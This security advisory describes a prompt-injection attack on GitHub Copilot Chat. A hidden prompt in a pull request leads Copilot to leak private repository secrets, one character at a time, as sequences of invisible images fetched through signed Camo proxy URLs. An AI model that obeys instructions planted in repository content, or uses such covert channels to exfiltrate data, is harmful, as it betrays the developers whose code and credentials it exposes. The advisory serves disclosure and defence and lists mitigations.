Microsoft Events Flaw Exposes User Data
October 9, 2025Snake Keylogger Malware – Active IOCs
October 13, 2025Microsoft Events Flaw Exposes User Data
October 9, 2025Snake Keylogger Malware – Active IOCs
October 13, 2025Severity
High
Analysis Summary
A researcher discovered a high-severity prompt-injection attack against GitHub Copilot Chat that chained clever misuse of GitHub’s own image proxy (Camo) to exfiltrate secrets and source code from private repositories. Instead of directly sending stolen text to an attacker’s server, the exploit instructed Copilot to encode sensitive characters as invisible images; when the victim’s browser rendered those images, it made outbound requests that leaked the data. This attack blended social-engineering-style prompt injection with infrastructure abuse rather than exploiting a classic memory/overflow bug.
According to the Researcher, a hidden prompt or specially crafted comment in a PR (or other repo content) coerced Copilot into extracting a secret or code snippet, (2) output-handling/CSP protections were bypassed so Copilot’s response could reference externally hosted images, and (3) GitHub’s Camo image proxy was abused the researcher precomputed valid, signed Camo URLs mapping each character/symbol to a 1×1 transparent pixel hosted on an attacker server. By having Copilot “draw” the stolen string as a sequence of those tiny images, the browser issued a sequence of legitimate-looking Camo requests that encoded the secret one character at a time.
The proof-of-concept successfully reconstructed private repo contents and secret material in lab tests, demonstrating real-world impact (high CVSS score reported by researchers and coordinated disclosure to GitHub/HackerOne). Beyond data theft, the attack showed how AI assistants that read and synthesize private project content create new, non-traditional exfil channels when client rendering and platform proxies are trusted implicitly. The finding sparked broad press coverage and vendor attention because it exposed a new, practical pattern: prompt injection + trusted proxy = covert data pipeline.
GitHub responded by removing the abused capability, disabling image rendering inside Copilot Chat (neutralizing the Camo-based channel), and rolling out mitigations to harden input/output handling for Copilot interfaces; the vendor also engaged in coordinated disclosure and patching steps. The incident underlines three practical defenses: treat all LLM outputs as untrusted by design (strict I/O sanitization and partitioning), limit or audit automatic fetching/rendering of external resources (especially through platform proxies), and add provenance and intent checks when assistants access private data. Organizations should also assume attacker creativity, regularly adversarially test agent integrations, and monitor for unusual outbound fetch patterns through internal proxies
Impact
- Gain Access
Remediation
- Disable image rendering within Copilot Chat and similar AI interfaces to prevent data exfiltration via image-based payloads.
- Harden input and output sanitization in AI-driven tools to block prompt injections or unauthorized command execution.
- Restrict Copilot’s access to sensitive or private repositories unless explicitly approved by the user.
- Implement strict Content Security Policies (CSP) to block automatic loading of external images or scripts.
- Audit and validate proxy services like GitHub’s Camo to ensure signed URLs cannot be pre-generated or abused.
- Monitor outbound traffic from developer environments for unusual or repetitive external requests (e.g., invisible 1×1 image calls).
- Add anomaly detection rules in security tools to identify suspicious data exfiltration patterns via HTTP requests.
- Conduct prompt-injection testing and red-team exercises for LLM integrations to uncover potential abuse paths.
- Apply least-privilege access controls for Copilot and any AI assistant integrated with private codebases.
- Regularly review and update security policies to include AI-specific risks such as data leakage through model interaction.